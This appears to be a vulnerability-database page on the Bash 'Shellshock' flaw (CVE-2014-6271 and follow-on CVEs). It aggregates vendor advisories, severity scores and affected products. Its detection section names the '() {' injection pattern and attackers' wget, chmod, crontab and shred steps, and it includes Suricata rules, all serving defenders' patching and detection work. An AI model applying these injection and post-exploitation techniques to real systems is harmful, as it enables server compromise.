CVE-2014-6271
published 2014-09-24CVE-2014-6271: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute…
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-07-28
Exploited in the wild
EPSS
100.00%
100.0th percentile
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Affected
286 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | >= 10.0.0 < 10.10.0 | 10.10.0 |
| arista | eos | >= 4.10.0 < 4.10.9 | 4.10.9 |
| arista | eos | >= 4.11.0 < 4.11.11 | 4.11.11 |
| arista | eos | >= 4.12.0 < 4.12.9 | 4.12.9 |
| arista | eos | >= 4.13.0 < 4.13.9 | 4.13.9 |
| arista | eos | >= 4.14.0 < 4.14.4f | 4.14.4f |
| arista | eos | >= 4.9.0 < 4.9.12 | 4.9.12 |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| checkpoint | security_gateway | < r77.30 | r77.30 |
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_netscaler_adc | — | — |
| citrix | citrix_netscaler_sdx | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | citrix_xenapp | — | — |
| citrix | citrix_xendesktop | — | — |
| citrix | citrix_xenmobile | — | — |
| citrix | citrix_xenserver | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | netscaler_sdx | — | — |
| citrix | netscaler_sdx_firmware | < 9.3.67.5r1 | 9.3.67.5r1 |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
SIDs 31975-31978, 31985
bytes↗
() {- →Detect Shellshock exploit attempts by inspecting HTTP headers (User-Agent, Referer, Cookie, etc.) for the pattern '() {' which indicates a malicious Bash function injection attempt. ↗
- →Monitor web server logs and CGI paths for probing of common vulnerable endpoints such as /cgi-bin/test.cgi, /cgi-bin/test-cgi, /cgi-sys/defaultwebpage.cgi, and /cgi-bin/count.cgi. ↗
- →Detect ELF malware dropped to /tmp/ (e.g., /tmp/syslogd) with world-executable permissions (chmod 777) following a wget download, a common post-exploitation pattern in Shellshock attacks. ↗
- →Scan for ClamAV signature 'Linux.Flooder.Agent' on ELF binaries observed being downloaded to vulnerable targets via wget in Shellshock exploitation campaigns. ↗
- →Detect Shellshock exploitation attempts using Sourcefire/Snort SIDs 31975-31978 and 31985, and Cisco IPS signatures 4689-0 through 4689-3. ↗
- →Monitor for crontab modifications on web servers following exploitation, as attackers establish persistence by scheduling weekly re-download and re-infection of the malicious payload. ↗
- →Detect Shellshock exploitation attempts involving Base64-encoded payloads delivered via HTTP, used to evade signature-based detection of Perl IRC bots. ↗
- →Alert on use of the 'shred' command followed by file deletion on web servers, a stealth technique used by Shellshock attackers to remove evidence of dropped shell scripts. ↗
- ·The initial Bash patches for CVE-2014-6271 were found to be incomplete; follow-on CVEs (CVE-2014-7169, CVE-2014-6277, CVE-2014-6278) represent bypasses. Detection signatures must cover all variants. ↗
- ·Shellshock affects more than port 80; Shodan data showing 3515 vulnerable devices on port 80 is likely a significant undercount of the true exposure across all ports. ↗
- ·Scanning source IPs may be benign researchers rather than malicious actors; distinguishing malicious from non-malicious scans based on IP alone is not always possible. ↗
- ·Nessus remote detection of Shellshock relies on a vulnerable service calling Bash; LCE process accounting provides complementary detection via a different method. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_cisco7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
GNU Bash OS Command Injection Vulnerability
cisa·2025-10-02·CVSS 8.8
CVE-2014-6278 [HIGH] CWE-78 GNU Bash OS Command Injection Vulnerability
Vulnerability: GNU Bash OS Command Injection Vulnerability
Affected: GNU GNU Bash
GNU Bash contains an OS command injection vulnerability which allows remote attackers to execute arbitrary commands via a crafted environment.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability could affect an open-source component, third-party library, protocol, or proprietary implementation that could be used by different products. For more information, please see: http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027 ; https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23467 ; https://sec.clo
CISA
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2014-7169 [CRITICAL] CWE-78 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
Vulnerability: GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
Affected: GNU Bourne-Again Shell (Bash)
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code. This CVE correctly remediates the vulnerability in CVE-2014-6271.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-7169
Remediation Due Date: 2022-07-28
CISA
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2014-6271 [CRITICAL] CWE-78 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
Vulnerability: GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
Affected: GNU Bourne-Again Shell (Bash)
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Remediation Due Date: 2022-07-28
CISA ICS
Advantech EKI Vulnerabilities (Update B)
cisa_ics·2015-12-15
Advantech EKI Vulnerabilities (Update B)
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Advantech EKI Vulnerabilities (Update B)
Last RevisedAugust 23, 2018
Alert CodeICSA-15-344-01B
## OVERVIEW
This updated advisory is a follow-up to the updated advisory titled ICSA-15-344-01A Advantech EKI Vulnerabilities that was published December 15, 2015, on the NCCIC/ICS-CERT web site.
## --------- Begin Update B Part 1 of 3 --------
HD Moore of Rapid7 identified several vulnerabilities in Advantech’s EKI. Advantech has released updated firmware to mitigate these vulnerabilities.
## --------- End Update B Part 1 of 3 --------
These vulnerabilities could be exploited remo
VMware
VMware product updates address critical Bash security vulnerabilities
vendor_vmware·2014-09-30·CVSS 9.8
CVE-2014-6271 [CRITICAL] VMware product updates address critical Bash security vulnerabilities
VMSA-2014-0010: VMware product updates address critical Bash security vulnerabilities
a. Bash update for multiple products. Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187, CVE-2014-6277, CVE-2014-6278 to these issues. VMware products have been grouped into the following four product categories: I) ESXi and ESX Hypervisor ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell. ESX has an affected version of the Bash shell. See table 1 for remediation for ESX. II) Wi
Red Hat
bash: incorrect parsing of function definitions with nested command substitutions
vendor_redhat·2014-09-29·CVSS 9.8
CVE-2014-6278 [CRITICAL] CWE-119 bash: incorrect parsing of function definitions with nested command substitutions
bash: incorrect parsing of function definitions with nested command substitutions
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.
Statement: Red Hat no longer considers this bug to be a security issue. The change introduced in bash e
Red Hat
bash: uninitialized here document closing delimiter pointer use
vendor_redhat·2014-09-27·CVSS 9.8
CVE-2014-6277 [CRITICAL] CWE-78 bash: uninitialized here document closing delimiter pointer use
bash: uninitialized here document closing delimiter pointer use
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.
Statement: Red Hat no longer cons
CISA ICS
Bash Command Injection Vulnerability (Update A)
cisa_ics·2014-09-26·CVSS 9.8
[CRITICAL] Bash Command Injection Vulnerability (Update A)
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Bash Command Injection Vulnerability (Update A)
Last RevisedSeptember 06, 2018
Alert CodeICSA-14-269-01A
## OVERVIEW
This updated advisory is a follow-up to the original advisory titled ICSA-14-269-01 Bash Command Injection Vulnerability that was published September 26, 2014, on the NCCIC/ICS‑CERT web site.
A command injection vulnerability has been reported in the Bourne again shell (bash). Bash is the common command-line used in most Linux/Unix-based operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malici
Cisco
GNU Bash Environment Variable Command Injection Vulnerability
vendor_cisco·2014-09-26·CVSS 7.5
CVE-2014-6271 [HIGH] GNU Bash Environment Variable Command Injection Vulnerability
GNU Bash Environment Variable Command Injection Vulnerability
On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.
All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected serve
Ubuntu
Bash vulnerability
vendor_ubuntu·2014-09-24
CVE-2014-6271 Bash vulnerability
Title: Bash vulnerability
Summary: Bash allowed bypassing environment restrictions in certain environments.
Stephane Chazelas discovered that Bash incorrectly handled trailing code in
function definitions. An attacker could use this issue to bypass
environment restrictions, such as SSH forced command environments.
Instructions: In general, a standard system update will make all the necessary changes.
Palo Alto
PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
vendor_paloalto·2014-09-24·CVSS 9.8
CVE-2014-7169 [CRITICAL] CWE-78 PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 Successful attack requires that a user be able to add environmental variables to the bash environment. This is possible only for PAN-OS users that successfully authenticate to PAN-OS via SSH.
CVEs: CVE-2014-6271, CVE-2014-7169
Affected products: PAN-OS, Panorama
Palo Alto
PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
vendor_paloalto·2014-09-24·CVSS 9.8
CVE-2014-6271 [CRITICAL] CWE-78 PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
PAN-SA-2014-0004 Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on linux systems for processing commands. Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 Successful attack requires that a user be able to add environmental variables to the bash environment. This is possible only for PAN-OS users that successfully authenticate to PAN-OS via SSH.
CVEs: CVE-2014-6271, CVE-2014-7169
Affected products: PAN-OS, Panorama
Red Hat
bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
vendor_redhat·2014-09-24·CVSS 9.8
CVE-2014-7169 [CRITICAL] CWE-228 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still a
Red Hat
bash: specially-crafted environment variables can be used to inject shell commands
vendor_redhat·2014-09-24·CVSS 9.8
CVE-2014-6271 [CRITICAL] CWE-78 bash: specially-crafted environment variables can be used to inject shell commands
bash: specially-crafted environment variables can be used to inject shell commands
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
A flaw was found in the way Bash evaluated ce
Debian
CVE-2014-6278: bash - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in ...
vendor_debian·2014·CVSS 9.8
CVE-2014-6278 [CRITICAL] CVE-2014-6278: bash - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in ...
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.
Scope: local
bookworm: resolved (fixed in 4.3-9.2)
bullseye: resolved (fixed in 4.3-9.2)
forky: resolved (fixed in 4.3-9.2)
sid: resolved (fixed in 4.3-9.2)
trixie: resolved (fixed in 4.3
Debian
CVE-2014-6271: bash - GNU Bash through 4.3 processes trailing strings after function definitions in th...
vendor_debian·2014·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271: bash - GNU Bash through 4.3 processes trailing strings after function definitions in th...
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Scope: local
bookworm: resolved (fixed in 4.3-9.1)
bullseye: resolved (fixed in 4.3-9.1)
forky: resolved (fixed in 4.3-9.1)
sid: r
Debian
CVE-2014-6277: bash - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in ...
vendor_debian·2014·CVSS 9.8
CVE-2014-6277 [CRITICAL] CVE-2014-6277: bash - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in ...
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.
Scope: local
bookworm: resolved (fixed in 4.3-9.2)
bullseye: resolved (fixed in 4.3-9.2)
forky: res
Debian
CVE-2014-7169: bash - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malform...
vendor_debian·2014·CVSS 9.8
CVE-2014-7169 [CRITICAL] CVE-2014-7169: bash - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malform...
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
Scope: local
bookworm: resolved (fixed in 4.3-9.2)
bullseye: resolved (fixed in 4.3-9.2)
forky: resolved (fixed in 4.3-9.2)
sid: resolved (fixed in 4.3-9.2)
trixie: res
Citrix
Citrix Security Bulletin CTX200223
vendor_citrix·CVSS 9.8
CVE-2014-6271 [CRITICAL] Citrix Security Bulletin CTX200223
Citrix Security Bulletin CTX200223
CVE References: CVE-2014-6271, CVE-2014-7169, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Citrix
Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities
vendor_citrix·CVSS 9.8
CVE-2014-6271 [CRITICAL] Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities
Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities
of Problem Citrix is aware of recent vulnerability reports that impact GNU Bash and is actively investigating the potential impact of these issues on Citrix products. There are a number of CVEs related to this issue, the current set includes: CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 The following sections provide some initial guidance to customers on the potential impact of this issue. Please note that this issue is under active analysis and, as such, customers should check back frequently to get the current status of our response. Citrix XenApp & XenDesktop Most XenApp and XenDesktop components are Windows-based and, as such, are not affected by this vulnerability. Citrix recommend
Cisco
GNU Bash Environment Variable Command Injection Vulnerability
vendor_cisco
CVE-2014-6271 GNU Bash Environment Variable Command Injection Vulnerability
CVE-2014-6271: GNU Bash Environment Variable Command Injection Vulnerability
On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers. All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an
GHSA
GHSA-55cc-h8m2-x3mp: GNU Bash through 4
ghsa_unreviewed·2022-05-14·CVSS 9.8
CVE-2014-6277 [CRITICAL] CWE-78 GHSA-55cc-h8m2-x3mp: GNU Bash through 4
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.
GHSA
GHSA-6hfc-grwp-2p9c: GNU Bash through 4
ghsa_unreviewed·2022-05-13·CVSS 9.8
CVE-2014-6271 [CRITICAL] CWE-78 GHSA-6hfc-grwp-2p9c: GNU Bash through 4
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
GHSA
GHSA-f7j6-xrjp-vffg: GNU Bash through 4
ghsa_unreviewed·2022-05-13·CVSS 9.8
CVE-2014-7169 [CRITICAL] CWE-78 GHSA-f7j6-xrjp-vffg: GNU Bash through 4
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
GHSA
GHSA-6493-28fj-f93w: GNU Bash through 4
ghsa_unreviewed·2022-05-13·CVSS 9.8
CVE-2014-6278 [CRITICAL] CWE-78 GHSA-6493-28fj-f93w: GNU Bash through 4
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.
OSV
CVE-2014-6278: GNU Bash through 4
osv·2014-09-30·CVSS 9.8
CVE-2014-6278 [CRITICAL] CVE-2014-6278: GNU Bash through 4
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.
OSV
CVE-2014-6277: GNU Bash through 4
osv·2014-09-27·CVSS 9.8
CVE-2014-6277 [CRITICAL] CVE-2014-6277: GNU Bash through 4
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.
OSV
CVE-2014-7169: GNU Bash through 4
osv·2014-09-25·CVSS 9.8
CVE-2014-7169 [CRITICAL] CVE-2014-7169: GNU Bash through 4
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
OSV
CVE-2014-6271: GNU Bash through 4
osv·2014-09-24·CVSS 9.8
CVE-2014-6271 [CRITICAL] CVE-2014-6271: GNU Bash through 4
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
VulnCheck
GNU Bourne-Again Shell (Bash) Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2014·CVSS 9.8
CVE-2014-6277 [CRITICAL] GNU Bourne-Again Shell (Bash) Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
GNU Bourne-Again Shell (Bash) Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6
VulnCheck
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
vulncheck·2014·CVSS 9.8
CVE-2014-6271 [CRITICAL] CWE-78 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code.
Affected: GNU Bourne-Again Shell (Bash)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.bitdefender.com/blog/hotforsecurity/shellshock-bug-exploited-in-the-wild-now-patched-by-apple/; https://www.trendmicro.com/en_us/research/14/k/bashlite-affects-devices-running-on-busybox.html; https://www.virusbulletin.com/virusbulletin/2018/03/vb2017-paper-router-all-evil-more-just-default-passwords-and-silly-scripts/; https://blog.talosintelligence.com/2019/04/seaturtle.html; https://www.lacework.com/blog/spytech-necro-keksecs
VulnCheck
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
vulncheck·2014·CVSS 9.8
CVE-2014-7169 [CRITICAL] CWE-78 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code. This CVE correctly remediates the vulnerability in CVE-2014-6271.
Affected: GNU Bourne-Again Shell (Bash)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.bitdefender.com/blog/hotforsecurity/shellshock-bug-exploited-in-the-wild-now-patched-by-apple/; https://www.virusbulletin.com/virusbulletin/2018/03/vb2017-paper-router-all-evil-more-just-default-passwords-and-silly-scripts/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.talosintelligence.com/content/files/2025/03
Suricata
ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
suricata·2021-01-25
CVE-2014-6271 ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT VisualDoor Sonicwall SSL VPN Exploit Attempt"; flow:established,to_server; http.uri; content:"/cgi-bin/jarrewrite.sh"; endswith; fast_pattern; http.user_agent; content:"|28 29 20 7b|"; reference:url,darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/; reference:cve,2014-6271; classtype:attempted-admin; sid:2031543; rev:2; metadata:attack_target Client_Endpoint, created_at 2021_01_25, cve CVE_2014_6271, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_25;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt
suricata·2015-11-04·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt
ET WEB_SERVER Possible CVE-2014-6271 Attempt
Rule: alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt"; flow:established,to_server; content:" HTTP/1."; pcre:"/^[^\r\n]*?HTTP\/1(?:(?!\r?\n\r?\n)[\x20-\x7e\s]){1,500}\n[\x20-\x7e]{1,100}\x3a[\x20-\x7e]{0,500}\x28\x29\x20\x7b/s"; content:"|28 29 20 7b|"; fast_pattern; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2022028; rev:2; metadata:created_at 2015_11_04, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2019_10_08;)
Suricata
ET EXPLOIT QNAP Shellshock script retrieval
